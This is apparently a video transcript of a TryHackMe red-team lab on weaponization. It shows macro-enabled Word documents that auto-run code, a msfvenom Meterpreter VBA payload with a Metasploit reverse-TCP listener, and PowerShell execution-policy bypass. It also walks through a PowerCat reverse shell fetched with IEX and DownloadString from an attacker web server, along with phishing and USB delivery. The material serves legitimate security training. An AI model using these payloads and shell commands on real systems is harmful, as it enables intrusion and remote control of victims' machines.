The next stage is weaponization. Once you spotted your victim, the next stage is creating a weapon. hello.vbs. Now, when I enter, I can see the pop-up message. I'm typing enter. Here we go. I'm just clicking run and moving to this page. You can see the prompt changed. Now we are inside the victim's machine. Visual Basic for application. We already seen Visual Basic script. What is VBA? What is the difference between those? We used the Visual Basic script within a simple VBS document or a text document, but here we are going to use that Visual Basic script within another application. So you may ask what kind of application it is. It may be a Microsoft document. So let me showcase how to do that. VBA stands for Visual Basic for Applications, a programming language by Microsoft implemented for Microsoft applications such as Microsoft Word, Excel, PowerPoint, etc. So we can combine this Visual Basic script and the Microsoft document and create our own bad Excel document or the Microsoft document. The VBA programming allows automating tasks or nearly every keyboard and mouse interaction between the user and Microsoft Office application. Macros. So you need to understand the term macros. Macros are Microsoft Office applications that contains embedded code written in the programming language known as Visual Basic for Applications, VBA. So they call it as VBA macros. So this is the feature enabled by Microsoft in Microsoft applications where we can use Visual Basic script along with the Microsoft documents. It is used to create custom functions to speed up multiple tasks by creating automated processes. They created this particular feature for the different thing, but the attackers are threat actors using it for malicious purposes. One of the VBA's features is accessing Windows application programming interface and other low-level functionality. If you have no idea what is Windows API, they gave the link, the Wikipedia link of Windows API. You can simply Google it and you will get to know. And other low-level functionality. For more information about VBA, visit another link, the Visual Basic for Application. And in this task, we will discuss the basic of VBA and the ways the adversary uses macros to create malicious Microsoft documents. To follow up along with content of this task, make sure to deploy the attached Windows machine in task 2. We already spawned that. Now open Microsoft Word 2016 from the start menu. Once it is opened, we close the product key. Okay, these are all some guidance to open the Windows Office, sorry, Microsoft Office. Now this is where we need to concentrate. Now create a new blank Microsoft document to create our first macro. All right. The goal is to discuss the basics of language and show how to run it via Microsoft Word when a Microsoft Word document gets opened. The first, we need to open the Visual Basic Editor by View and Macros. So first of all, let me get into the Windows machine, and from Windows machine, I need to open Word, Microsoft Word 2016. All right. Now I am in the Microsoft Word. I can go to View and Macros. So this is the window showcased here, and I'm going to simply create a macro with the name subscribe, and I'm going to create, and before that, macros in document 1. I'm simply choosing the same that they chose here. When I click create, I got this new window where we will be able to write the Visual Basic script. So that script going to work along with the Microsoft document. I think this is no longer required. Let me go here. Yeah. In macros name section, we chose to name our macro as THM. Okay. These are all the general things. Next, Microsoft Visual Basic for Application Editor shows where we can write our VBA code, as I said before. Let's try to show the message box for the following message. Again, the same code, the same kind of message box we are going to spawn by triggering the Microsoft Word application. All right, so let's write the code. I'm simply gonna invoke message box. Please subscribe. Closing the bracket, and that's it. Just one line. Now I can simply run this macro by pressing the F5 or by following this step. So when I click run this. When I run this, it simply gives me the message box with the message that I defined. All right. Now one more thing we need to make sure, we need to if we need to trigger the payload when the victim opens the Microsoft document, we need to define few other functions called document open and auto open along with our uh, function to pop up the message box. Okay, let's do some small modification here. We are just going to add a couple of functions. Okay, so I'm simply going to copy this function, copy both this function and paste it here. Yeah, I just did this. Now it looks fine. Let's save this. Before saving this, let's read this important message. It is important to note that to make macro work, we need to save it in macro enabled formats such as doc and docm. So this is very important. So when you are saving this document, make sure you are choosing the respective format. Save as type into word macro enabled document. Okay, I'm simply saving it. All right, now it is time to trigger the malware, that malicious the code, by opening the document that we created. So this is the document that I created, Microsoft Windows macro enabled document. I'm simply double clicking, so it opens. Here you can see the security warning. Macro have been disabled now. If you want to enable the content, it's simply asking. So when I click this, I got a error. I made a mistake here. So I simply copied and paste. The function name is subscribe. So I need to substitute subscribe instead THM. Now it looks fine. Saving it. Now again I'm triggering. When I trigger, it gave me the message box. So this is the simple macro script to spawn a message box. All right. Now, and one more thing you need to keep in mind when you click enable content, then only that macros will be triggered. Okay, perfect. Now let's do some advanced stuff. So here we are having a function. So the function which is used to invoke calculator application. So this is the code where we are simply creating a variable called payload as string. So the data type is string, and the string is calculator.exe, and we are creating an object wscript.shell dot, and we are going to run it. Okay, so this is the simple script. Let's get into that. Again, I'm going to view macro subscribe. I'm going to edit that. So here I'm simply going to replace the function, and I'm going to change the function name. Perfect. Now I saved this. When I trigger the document this time, I should be getting the calculator. Let's see. Here we go. We got the calculator. So also in malware bazaar, malware users usually uses the Microsoft Office documents in order to distribute the malwares, because the Office documents are ubiquitous, and people often use the Microsoft Office documents. So that is often the target of threat actors. DOCM. Let me choose DOCM. For example, I can see the bunch of macro enabled documents which carries malware. All right. So which is how we need to spawn an application by triggering the macros, and same as the previous example, as I shown in HTA, we can also use this Microsoft documents to get the reverse shell. Everything is possible. And this time they gave an example with Meterpreter payload, which is a persistent shell compared to the Netcat shell, and the file type is VBA. Okay, so why don't we try that this time? I need to change the localhost IP. It's nothing but 10 dot 10 dot 201 dot 13, and the port is 443, and the type is VBA. All right. Okay. It is generating the payload. So this is the payload, the Visual Basic for applications payload. We can simply copy this macro and paste it in the Word document, the macro editor. So let me store this somewhere. -o VBA macro dot VBA. Earlier, the outcome was difficult to copy and paste. If I miss any line, it won't give the desirable outcome. So that's why I simply forwarded that outcome to a document. I'm simply gonna copy from the document. haven't copied that. Sublime VBA, macro VBA. All right. Now I copied the payload. Let me go to the macro editor once again. I'm in the Word document, macro editor, the same POC document call, and I'm going to edit. I'm removing everything here and pasting. Now let me paste it. That's it. So we generated the payload. We are not even writing a single line here. Simply generating the payload by using MSF Venom and saving the document. Now the document is ready. The next thing we need to do is, and here is a point important to note. Note that one modification need to be done to make this work. The output will be working on MS Excel sheet. Therefore, change workbook open to document open. So we need to do a small modification here. Let me open this. It won't work now. View, macros. It is workbook open. I need to change it to document open. Now it looks fine. All right. Now from the attacker machine, let's initiate the listener. All right. MSF console -q. I'm quickly opening it. I'm going to use this multi-handler. Use exploit multi-handler. And I'm going to set payload Windows Meterpreter reverse TCP. All right. Now I'm setting the local host, the attacker host IP, L host 10.10.201.13, set L port 443. Exploit. I just reset this payload L host and L port. Now the handler, the listener has been initiated. Now all we need is we need to trigger this document where we already inserted the macros that we created by using the MSF Venom. So we are just going to open the document. So I opened the document. I also got the Meterpreter shell here. You can see sysinfo. Let me give sysinfo. I can able to see I am in the victim's machine now. So this is another excellent way to, to exploit the victims. So far we have seen uh, Windows scripting host, HTA, HTML application, and Visual Basic for application. And the last but not least, PowerShell, PSH, what it is. PowerShell, it's a famous scripting engine, an application come up with the Windows operating system, and it is actually it developed on .NET framework. So it is based on .NET, and which is more powerful than the obsolete command prompt. So let's see. PowerShell is an object-oriented programming language executed from dynamic language runtime in .NET. So as I said, it is not .NET based, with some expectation, with some exceptions for legacy users. Check out TryHackMe room. So there is a TryHackMe room, separate room, in order to learn the PowerShell. But let's learn the PowerShell in a separate video. And red teamers rely on PowerShell in performing various activities, including initial access, system enumerations, and many others. Let's start by creating a straightforward PowerShell script that prints, as usual, the same message. Okay. So this is the simple line. We can simply create a script with one line, which will give us the message box. Okay. Now let's create the file. In order to create, again, we are going to use new item type. It is file, and the file name is thm.ps1, and the extension might look weird, but this is the extension of PowerShell scripts, PowerShell. Okay, ps1, and it will eventually create a document called thm.ps1. Let me create that. Not yet created. New item type file thm.ps1. Now it created. I can see the file here, which is on desktop. Let me edit that file now. It is opening PowerShell ICE, so which is the scripting engine, integrated scripting engine, I guess. So it comes with every Windows operating system, where you will be able to create your own script and you will be able to execute it. All right, now let's write this. Just one line. I'm going to copy and paste. I'm saving it. So I'm just running the script. There is an error. So let's try to run it from here. And the run in order to run the PowerShell script, this is the command: PowerShell hyphen file and the file name. Let's try that. PowerShell hyphen file thm.ps1. I gave the enter, but what it says: unauthorized access cannot be loaded because running script information. See about the execution policies. Note down this particular line. See about the execution policies. Execution policies, actually, it is a security feature provisioned with PowerShell, which prevents the unauthorized sources or users from running scripts on the machine. So which is a security mechanism. So get execution policy. That is the command to know the current execution policy in the machine. And the execution policy is restricted. Restricted means it will simply not let anyone to run the script. So that is the uh, meaning. And they also give the definition for the execution policy. PowerShell's execution policy is a security option to protect the system from running malicious scripts. By default, Microsoft disables executing PowerShell PS1 script for security purposes. So we need to manipulate the execution policy in order to execute the PowerShell script. Okay. Now we can manipulate the execution policy by using this particular command. Set execution policy hyphen scope current user. We are just going to reset the execution policy for the current user alone, and we are going to set it as remote signed. Okay, so let's do that. We are going to set the execution policy, and the scope would be the current user, and the execution policy will be remote signed. It will be asking, it will be giving us a warning. The execution policy helps to protect you from the script that you don't trust. Changing the execution policy that might expose to your security risks. So it might lead to some security risk. So, or you want to acknowledge. So it is asking that. I'm giving yes. Now let me verify the execution policy. Now it is changed. Earlier it was restricted. All right. Now I can execute the script without a problem. When I finish the script, it will give us the message pop-up. You can see, welcome to the weaponization room. It simply writes the message in the PowerShell window. All right. Here you can see the remote signed execution policy and the bypass type. So Microsoft provides the ways to disable this restriction. One of these ways is by giving an argument option to the PowerShell command to change it to the desired to the desired setting. An example, we can change it to bypass. So earlier we set it to remote signed, but instead we can set it to bypass policy, which means nothing is blocked, nothing is restricted. You can run anything. You can run any kind of PowerShell script. It won't restrict. So that is the bypass. Usually it is not recommended. So far we tested a simple script. To the next level, we can also get the reverse shell, as we explained in the previous STA and WSH and the VBA macros. Even with PowerShell, it is possible. So in order to do that, we need to download a particular package called PowerCat. Let's see what is PowerCat. PowerCat is a PowerShell function. First, you need to load the function before you can execute it. So they gave some steps to handle it. So we are just downloading the script powercat.git, and we need to set up the web server to distribute this particular file. All right, and we need to initiate the netcat listener for the port that we wish. We can use any port here. From the victim's machine, when you execute this particular command, it will simply invoke web request. So let's try that. We need the attacker machine. Attacker machine is ready. So let's download the PowerCat. Now the PowerCat has been downloaded. So here is our cute little PowerCat script. Let me open that. It's a huge script. You can refer this whenever you get the time. All right. So we downloaded the PowerCat now. Now all we need is uh, to establish a web server on this path. Python 3 hyphen m http dot server port 8080 once again. All right. And we can also enable the Netcat listener. I'm using the same port netcat hyphen lvnp 1337. Okay, now my attacker machine is ready. I hosted the PowerCat script on the web server and initiated the listener. Now all we need is to invoke this particular PowerCat script. In order to do that, here is our cute little script. So let me explain what it is. Before that, let me open it in a separate window. All right. Now let me explain what it is. We are just going to execute the PowerShell script hyphen C silent manner in silent manner and IEX means invoke expression. It is another commandlet, PowerShell commandlet, which is used to detonate the payload. Okay, detonate the request or something. Okay, and after IEX, new object we are creating system.net.web client. So it is creating a WebSocket and it is going to download a particular string from this URL. So this URL is going to perform download operation. After that, uh, this is a different command powercat hyphen c attack box IP hyphen p 1337. So this is the port that we initiated netcat listener. So we are going to use the same and hyphen e cmd. So this is the command. So let me copy the command and paste it over my victim's machine. So this is my victim machine. So let's keep this window here. Here I need to add my attacker box IP, and the attacker box IP is 10.10.103.75. 10.10.103.75. All right. Now we are good to go. One more change here. 10.10.103.75. You can see we received the reverse shell from the victim's machine. Okay. Here we can validate its IP address. Same machine. So this is the excellency of PowerShell. And the PowerShell is the popular programming language among uh, ethical hackers and hackers, of course, since it is used in Windows operating system. Windows operating system is widely used by most of the users, end users. So also Windows operating system is used to run servers. So that is the reason. And yeah, we accomplished the PowerShell command and control. This is just a theoretical part. In earlier sections, we have seen how to create a malicious payload, how to weaponize a payload, and get the reverse shell or do the activity that we want. But command and control, it's a server owned by uh, red teamer or ethical hacker or threat actor. It's like a command center, so from where they are going to give some command to their victims. Okay, so once the victim clicked the document, they will be directly reporting to this command and control server only. So this is very important, and we can see this command and control framework in a different video. This is a big topic, so just a theoretical overview here. So these are the three popular frameworks: C2 frameworks, PowerShell Empire, an open source framework; Cobalt Strike, commercial framework. Paid actors only, paid users only can use it, and also it is used by threat actors. Actually, the threat actors using the cracked Cobalt Strike version to distribute the malwares, and also you can use Metasploit for this purpose. You can see what is command and control here. C2 frameworks are post-exploitation frameworks that allows red teamers to collaborate and control compromised machines. C2 is considered one of the most important tools for red teamers during offensive cyber operations. C2 frameworks provides fast and straightforward approaches to generate various malicious payloads, enumerate the compromised machines and networks, perform privilege escalation, persistence, lateral movement, and any other activity that you want. Some popular C2 frameworks that we will be briefly highlight, uh, as I stated before, these three popular frameworks are there. Cobalt Strike is commercial framework, and PowerShell Empire is open source framework. Metasploit is also an open source framework, which is available. So this is all about this part. Next, let's see the delivery techniques. We created a payload. How we can distribute that payload to our victims? So that is the important topic to discuss. So it can be over the email. We can send the phishing email with the document that we crafted, and it can also be a web delivery. We can compromise. We can set up a website which supplies that particular payload. In our earlier exercise, I have showcased how to set up a Python server simply, which will distribute the payload. So like that, we can simply host the payload on a website. And in order to in order to do the email delivery, you need to have your own phishing infrastructure, and that is a different topic to discuss. So as of now, just get to know we can distribute it over the phishing emails as well as the website. And of course, USB also is one of the options to distribute the malwares. And there are some popular products like Rubber Ducky and USB Harpoon, which can be used for distributing malwares. And the last, okay, which method is used to distribute the payloads to victims at social events? So here we go. The answer is USB delivery. This method could be effective and useful at conferences or events where the adversary can distribute the USB. So it is nothing but USB delivery. And the last part is practice arena, where TryHackMe hosted one more machine. So you can simply spawn this machine and you will be getting a URL. So once you trigger the URL from your web browser, it will be it will be showing a web page where you will be able to upload both files as well as you can paste the URL. So you can simply host one malicious payload in a particular URL, and you can paste that URL here, or you can craft one malicious document and you can upload the document here. So once it is done, you will be getting the respective outcome. Okay, so I'm going to leave this particular part to you. So you can practice that. Once you compromised this particular machine, whatever the machine that you are spawning, you will be getting the flag, so you can submit it over here. So yeah, this is what I wanted to discuss with you, so which is very important topic. So every person who is in cyber defense or in community should be uh, aware of this particular payloads and all. So I'll catch you next time with another excellent video. Hope you enjoyed this. You learned something new from this. If you really did, consider hitting the like button and subscribing my channel. You can put your opinion, perceptions in the comment section. I'll be reading those. I'll try to comply with that. I'll try to obey that. Okay. Yeah, I'll catch you next time. Until then, I'm signing off. Take care, guys. Love you all. Thank you.